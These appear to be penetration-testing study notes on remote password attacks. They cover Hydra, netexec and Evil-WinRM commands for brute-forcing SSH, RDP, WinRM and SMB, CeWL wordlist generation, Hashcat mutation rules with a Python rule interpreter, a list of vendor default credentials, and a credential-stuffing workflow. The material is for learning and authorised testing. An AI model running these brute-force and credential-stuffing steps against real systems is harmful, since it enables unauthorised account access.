Remote Password Attacks

Common Network Services Overview

Network services frequently targeted during penetration testing include:

  • Authentication services (SSH, RDP, WinRM)

  • File sharing services (FTP, SMB, NFS)

  • Email services (IMAP/POP3, SMTP)

  • Database services (MySQL/MSSQL)

  • Directory services (LDAP)

Attack Methodologies & Tools

Windows Remote Management (WinRM)

  • Protocol Details:

    • Uses WS-Management (SOAP-based XML)

    • Ports: TCP 5985 (HTTP), 5986 (HTTPS)

    • Requires manual activation on Windows 10+

Netexec (formerly CrackMapExec)

# Installation (the package installs the netexec command; the old package name was crackmapexec)
sudo apt-get -y install netexec

# Basic Usage
netexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>

# Example
netexec winrm 10.129.42.197 -u user.list -p password.list

Evil-WinRM

# Installation
sudo gem install evil-winrm

# Usage
evil-winrm -i <target-IP> -u <username> -p <password>

Secure Shell (SSH)

  • Details:

    • Default Port: TCP 22

    • Relies on three classes of cryptographic primitives:

      • Symmetric (shared key)

      • Asymmetric (private/public keys)

      • Hashing for message authenticity

# Brute force with Hydra
hydra -L user.list -P password.list ssh://<target-IP>

# Standard connection
ssh <user>@<target-IP>

Remote Desktop Protocol (RDP)

  • Details:

    • Default Port: TCP 3389

    • Provides GUI remote access to Windows systems

# Brute force with Hydra
hydra -L user.list -P password.list rdp://<target-IP>

# Connect with xFreeRDP
xfreerdp /v:<target-IP> /u:<username> /p:<password>

Server Message Block (SMB)

  • Details:

    • Ports: TCP 139, 445

    • Used for file and printer sharing

    • Open-source version: Samba

# Brute force with Hydra
hydra -L user.list -P password.list smb://<target-IP>

# Using Metasploit
use auxiliary/scanner/smb/smb_login

# List shares with netexec
netexec smb $ip -u "$user" -p "$password" --shares

# Connect to shares with smbclient
smbclient -U "$user" \\\\$ip\\$SHARE

Password Mutation Techniques

Using Hashcat Rules

  • Basic rule syntax:

    • : → Do nothing

    • l → Convert to lowercase

    • u → Convert to uppercase

    • c → Capitalize first letter

    • sXY → Replace all X with Y

    • $! → Add ! to end

# Example custom rule file (custom.rule)
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

# Generate mutations
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
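As an added example (not part of the original notes, and not hashcat's own code), a small Python interpreter for the rule subset listed above: it applies custom.rule to a constructed two-word stand-in for password.list and, from the defender's side, lets a password policy check flag candidates that are just rule mutations of dictionary words.

```python
"""Interpreter for the hashcat rule subset used in custom.rule.

Added example, not part of the original notes or of hashcat itself.
Supports ':', 'l', 'u', 'c', 'sXY' and '$X'; whitespace-separated
functions on one line are applied left to right, as hashcat does.
"""

def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line (e.g. 'c so0 $!') to a single word."""
    for fn in rule.split():
        if fn == ":":                      # no-op, keeps the original word
            continue
        if fn == "l":
            word = word.lower()
        elif fn == "u":
            word = word.upper()
        elif fn == "c":                    # hashcat 'c': upper first, lower the rest
            word = word[:1].upper() + word[1:].lower()
        elif fn.startswith("s") and len(fn) == 3:
            word = word.replace(fn[1], fn[2])   # sXY: replace every X with Y
        elif fn.startswith("$") and len(fn) == 2:
            word = word + fn[1]                 # $X: append X
        else:
            raise ValueError(f"unsupported rule function: {fn!r}")
    return word

def mutate(words, rules):
    """Every rule applied to every word, deduplicated like `sort -u`."""
    return sorted({apply_rule(w, r) for w in words for r in rules})

# The custom.rule file from the notes, one rule line per list entry
CUSTOM_RULE = [":", "c", "so0", "c so0", "sa@", "c sa@", "c sa@ so0",
               "$!", "$! c", "$! so0", "$! sa@", "$! c so0", "$! c sa@",
               "$! so0 sa@", "$! c so0 sa@"]

# Constructed sample wordlist standing in for password.list
SAMPLE_WORDS = ["password", "football"]

def is_trivial_mutation(candidate, words, rules=CUSTOM_RULE):
    """Defender check: would a rule-based mutation run produce this password?"""
    return candidate in set(mutate(words, rules))

if __name__ == "__main__":
    for m in mutate(SAMPLE_WORDS, CUSTOM_RULE):
        print(m)
```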

CeWL for Custom Wordlists

# Basic syntax
cewl <URL> -d <depth> -m <min_word_length> --lowercase -w <output_file>

# Example
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist

Credential Stuffing Attacks

Default Credentials

  • Common examples:

    Zyxel (ssh):        zyfwp:PrOw!aN_fXp
    APC UPS (web):      apc:apc
    Weblogic (web):     system:manager
    Kali Linux (OS):    kali:kali
    D-Link (web):       admin:admin

Using Hydra for Credential Stuffing

# Basic syntax
hydra -C <user_pass.list> <protocol>://<IP>

# Example
hydra -C default_creds.list ssh://10.129.42.197

Best Practices & Tools Summary

Key Tools

  • Netexec: Multi-protocol pentesting

  • Evil-WinRM: WinRM interaction

  • Hydra: Multi-protocol password brute-forcing

  • xFreeRDP: RDP client

  • Hashcat: Password mutation

  • CeWL: Custom wordlist generation

OSINT Considerations

  • Research target organization for:

    • Naming conventions

    • Common applications

    • Default credentials

    • Password policies

    • Breached credentials

Attack Workflow

  1. Gather target information and credentials

  2. Generate custom wordlists using CeWL

  3. Create mutations using Hashcat rules

  4. Attempt credential stuffing with default passwords

  5. Use appropriate tool based on service (Hydra, Netexec, etc.)